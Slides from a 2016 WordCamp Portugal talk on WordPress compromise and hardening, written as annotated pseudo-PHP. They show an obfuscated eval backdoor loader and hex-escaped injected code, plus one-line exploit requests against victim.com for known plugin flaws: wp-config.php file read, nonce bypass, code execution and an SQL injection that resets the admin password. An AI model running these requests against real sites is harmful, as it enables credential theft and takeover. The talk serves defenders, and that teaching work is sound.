Slides from my talk at WordCamp Portugal 2016 about hellodev's experience with self-hosted WordPress websites and the security issues around them. Tips and other useful information inside.
8. /* Primeiros contactos com sites
comprometidos */
<?php
// Silence is golden.
// NOTE(review): "Silence is golden." is the stock comment WordPress ships in
// its empty placeholder index.php files; a backdoor that reuses it is meant to
// pass as one of those stubs on a quick directory listing.
$x =“NFbkn
veorgASDgaskdhfkashdfpwehibvasipdhvaipegaiweHFAPEIgaPIyeiaaipwehgwEG
$34h293gHW)EHG(QHgQ(WEGH#$)GhQªGH)EHGQ3223nfk2n3f23nçkfn2ç34”;
// Classic obfuscated-loader chain: base64 -> rot13 -> inflate -> eval. The
// real payload is never readable on disk, so scanners should key on the
// decoder chain itself (eval wrapped around gzinflate/str_rot13/base64_decode)
// rather than on the string contents. The blob above is illustrative only --
// it contains characters that are not valid base64 ("(", ")", "#", "ª", "ç").
$r=eval(gzinflate(str_rot13(base64_decode($x))));
9.
10. /* Como uma instalação de
WordPress pode ser
comprometida */
// RESPONSIBLE FOR 70% OF THE ATTACKS
// Initial-access vectors for compromised WordPress installs as cited in the
// talk: plugins (typically outdated ones, cf. the "update" advice on a later
// slide) and password guessing account for the bulk; the remaining share is
// spread over custom code, themes, hosting and file permissions. Figures come
// from the Wordfence report referenced below, not from hellodev's own data.
$first =“plugin”;
$second =“brute force”;
// OTHER 30%
$other = array(“code”, ”theme”, ”hosting”, ”file permissions”);
/* Source: Wordfence March 2016 */
11. /* O que fazem depois? */
// MOST OF THEM
// What attackers do once they have a foothold, most to least common per the
// talk. Defacement or a takedown is noticed quickly; spam relaying, SEO spam
// (injected links/pages) and redirects can run unnoticed for a long time,
// which is why monitoring outbound mail volume, unexpected pages and search
// engine warnings matters even when the site still looks fine.
$first_choice =“deface or take offline”;
$second_choice =“send spam”;
$third_choice =“seo spam”;
$other =“redirect”;
/* Source: Wordfence March 2016 */
12. /* Site comprometido por um
plugin */
// MOST COMMON METHOD
$using_method =“Local File Inclusion (LFI) attack.”;
// EXAMPLE - INJECTED CODE
// Obfuscation pattern worth recognising: every variable is reached through
// $GLOBALS with its name spelled in hex escapes. The slide rendering has
// stripped the backslashes, so "Gx4cOx42x41x4cx53" is "G\x4cO\x42\x41\x4c\x53",
// i.e. "GLOBALS". Decoded, the assigned values are ordinary-looking names
// such as "template", "title", "stripArr" and "mk_temp" -- the code reads as
// plugin boilerplate once it runs but as gibberish on disk. Detection tip:
// hex-escaped "GLOBALS" keys (${"\x47LOBALS"} and variants) rarely occur in
// legitimate plugin code and make a cheap grep/scanner signature.
<?php ${“Gx4cOx42x41x4cx53"}["x69wirx72x63x66x76"]="x69";${"x47Lx4fx42ALx53"}
["x61rx6bmx64z"]="mx6bx41x72r";${"x47x4cOx42x41x4cS"}["ex6ax71x68x68j
x6c"]="x6dx6bx5ftx65x6dp";${"GLOx42x41x4cx53"}["x72x66lx73x65x76x68m
x67x68x79"]="x73tx72x69x70Ax72x72";${"Gx4cx4fx42x41x4cx53"}["v
x72x72x71x78x6dx6dx77y"]="x63ax74x5fcross";${"x47x4cx4fx42ALx53"}
["x72x73x77x70x61x6cx78tx62x79n"]="tex6dx70lx61te";${"GLx4fx42Ax4cx53"}["g
x78x67ycx74x71x73"]="tx69tlx65"; ?>
13. /* Site comprometido por um
plugin */
// EXAMPLE - DOWNLOAD WP-CONFIG.PHP FILE - REVSLIDER
// Path traversal: the img parameter of this admin-ajax action is used as a
// file path, so "../wp-config.php" hands back the site configuration (DB
// credentials and auth salts). The request below carries no cookie or token,
// so the action is evidently reachable without a session. Strictly this is an
// arbitrary file read/download rather than an inclusion, although the slide
// files it under LFI. Defender side: keep the plugin current (it is often
// bundled inside a theme and may not show up in the plugin list -- verify on
// your installs), rotate the DB password and salts after any exposure, and
// alert on access-log entries for revslider_show_image whose query contains
// "../".
$wpconfig_content = file_get_contents(“http://victim.com/wp-admin/admin-
ajax.php?action=revslider_show_image&img=../wp-config.php”);
/* Source: http://finalphoenix.me/ */
14. /* Site comprometido por um
plugin */
// EXAMPLE - PHPINFO WITH CONSTANTS OR DOWNLOADING BACKUPS OR
UPLOADING FILES
// The AJAX handler is gated only by a nonce, and the nonce itself is served by
// an admin page that the first request fetches without any session cookie. A
// WordPress nonce is a CSRF token, not an authorisation check: the handler
// should also verify a capability (current_user_can) before exposing
// phpinfo(), backup downloads or uploads. Site owners fix this by updating the
// plugin; plugin authors should never treat a nonce as proof of privilege.
$nonce = file_get_contents(“http://victim.com/wp-admin/admin.php?
action=upgrade-plugin”);
$credentials = file_get_contents(“http://victim.com/wp-admin/admin.php?
action=updraft_ajax_handler&nonce=$nonce”);
/* Source: http://finalphoenix.me/ */
15. /* Site comprometido por um
plugin */
// EXAMPLE - EXECUTING SCRIPTS
// Remote code execution: the imgurl value evidently reaches an evaluation
// sink, so whatever is passed runs as the web server user (phpinfo() here is
// only the proof of concept). Any admin-post/admin-ajax action that evaluates
// or includes request data is a full compromise of the host account. Plugin
// side: treat imgurl as an opaque URL/path to validate, never as code. Site
// side: update or remove the plugin and review logs for
// easymedia_imgresize_ajax requests carrying code-like values.
$script_to_execute =“phpinfo()”;
$content_of_phpinfo = file_get_contents(“http://victim.com/wp-admin/
admin-post.php?action=wp_ajax_easymedia_imgresize_ajax?imgurl=
$script_to_execute”);
/* Source: http://finalphoenix.me/ */
16. /* Site comprometido por um
plugin */
// EXAMPLE - DATABASE INJECTION (MISSING ASCII TO HTML CODE CONVERSION)
// SQL injection through the orderby parameter: the value is concatenated into
// the query, so an UPDATE can be smuggled in and the password of user id 1
// (normally the first administrator) overwritten. $context is elided on the
// slide -- presumably a stream context carrying an authenticated session,
// since the page lives under wp-admin; confirm against the original write-up.
// Note that HTML-escaping the value, as the slide's subtitle suggests, would
// not stop this: ORDER BY column names cannot be bound as parameters, so the
// correct fix is to whitelist the accepted column names and build everything
// else with $wpdb->prepare().
$context = …
$query_to_inject =“update wp_users set password=md5(‘123’) where id=1”;
$chage_password = file_get_contents(“http://victim.com/wp-admin/admin.php?
page=aiowpsec&tab=tab1&orderby=$query_to_inject”, false, $context);
/* Source: http://finalphoenix.me/ */
17. /* Site comprometido por um
plugin */
// HOW TO PROTECT AGAINST ATTACKS THROUGH PLUGINS?
// Keeping plugins current closes the known holes shown on the previous slides.
// "dont use old plugins" should extend to removing deactivated ones: a
// deactivated plugin's files stay on disk and remain reachable by URL. When
// reviewing code, concentrate on request handling -- nonces without a
// capability check, request data flowing into file paths, eval/include, or
// SQL built by string concatenation.
$simple_solution =“update, update, update!”;
$other_tips = array (“dont use old plugins”,“search for news about security
issues”,“take a look at the code”);
18. /* Site comprometido por brute
force */
// PASSWORD GUESSING ATTACK
// Of these controls, two-factor authentication and lockout after repeated
// failures are the ones that actually stop guessing; renaming /wp-admin is
// obscurity only and does not cover other login surfaces, so treat it as a
// noise reducer rather than a security boundary. "create a new admin account"
// reads as: add a fresh administrator with a non-obvious username and
// demote or remove the default one, so the username is not a given.
$tips = array(“dont user obvious usernames”,“dont use simple passwords”,“create a new admin
account”);
$how_to_avoid =“two factor authentication”;
$other_solution = array(“change /wp-admin”,“blacklist IPs trying to login and failing for more than
x times”);
19. /* Site comprometido por outros
motivos */
// SET THE CORRECT PERMISSIONS
// Octal modes: 0755 = owner rwx, group/others rx; 0644 = owner rw, others r;
// 0444 = read-only for everyone. Making wp-config.php and .htaccess 0444 stops
// WordPress (and a compromised plugin running as the same user) from
// rewriting them, which is the intent, but 0444 is still world-readable: on
// shared hosting where other accounts see the same filesystem, an owner-only
// mode is preferable provided the PHP worker can still read the file. Expect
// to relax .htaccess temporarily when changing permalink settings, since
// WordPress writes its rewrite rules there.
$folders =“0755”;
$files =“0644”;
$wp_config =“0444”;
$htaccess =“0444”;
20. /* Site comprometido por outros
motivos */
// SET THE CORRECT .HTACCESS CONTENT
// Typical rules behind each item: deny-lists for abusive IPs; deny rules for
// wp-config.php, .htaccess itself and similar sensitive files; and an
// allow-list of extensions under wp-content/uploads so that an uploaded .php
// file is served as-is rather than executed. Caveat: .htaccess only takes
// effect on Apache with AllowOverride enabled; on nginx, or Apache with
// overrides disabled, the same rules must live in the server configuration.
$things_you_can_do = array(“block IPs”,“protect files”,“allow certain file
extensions from wp_content/*”);
21. /* Site comprometido por outros
motivos */
// HAVE LATEST OS UPDATES INSTALLED
// Illustrative pseudo-code ($i_have_a_server is not a real function): if you
// run the box yourself, the OS, web server and PHP runtime are part of the
// attack surface too and need patching on a schedule; on managed hosting this
// is the provider's job, which is worth confirming rather than assuming.
if ($i_have_a_server() == true) { update_os(); }